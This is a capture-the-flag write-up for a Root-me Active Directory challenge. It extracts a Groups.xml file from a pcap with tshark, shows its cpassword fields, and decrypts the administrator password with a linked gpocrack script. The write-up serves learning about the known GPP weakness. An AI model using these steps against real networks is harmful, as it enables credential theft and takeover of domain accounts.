Root-me.org

Active Directory - GPO

Group Policy Preferences

The statement says “Network traffic during boot sequence was recorded for an Active Directory workstation’s. Analyze this capture and find the administrator’s password.”

And we’re given a pcap file with that. There’s a few places where a Administrator password can be located. One of the most obvious place is the file Groups.xml. This file gets transfered via SMB on the network. If we open the pcap in wireshark and try to export SMB files, we’ll see a groups.xml.

tshark -r ch12.pcap --export-objects "smb,."

There’s a big flaw on how the password are encrypted. Windows always uses the same key. More info here https://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be.aspx

This makes it very easy to gather to password and make a simple script to decrypt it.

This is the content of the groups.xml

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Helpdesk" image="2" changed="2015-05-06 05:50:08" uid="{43F9FF29-C120-48B6-8333-9402C927BE09}"><Properties action="U" newName="" fullName="" description="" cpassword="PsmtscOuXqUMW6KQzJR8RWxCuVNmBvRaDElCKH+FU+w" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="Helpdesk"/></User><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrateur" image="2" changed="2015-05-05 14:19:53" uid="{5E34317F-8726-4F7C-BF8B-91B2E52FB3F7}" userContext="0" removePolicy="0"><Properties action="U" newName="" fullName="Admin Local" description="" cpassword="LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="" userName="Administrateur"/></User>
</Groups>

We can see that the password is

cpassword="LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0" 

Now we need to either make a script or fetch one on the internet. Here’s one [[https://raw.githubusercontent.com/MartinIngesen/gpocrack/master/gpocrack.py]]

A very simple python script when we run it we get this.

python gpocrack.py "LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0"
Password is: TuM@sTrouv3

References: https://adsecurity.org/?p=2288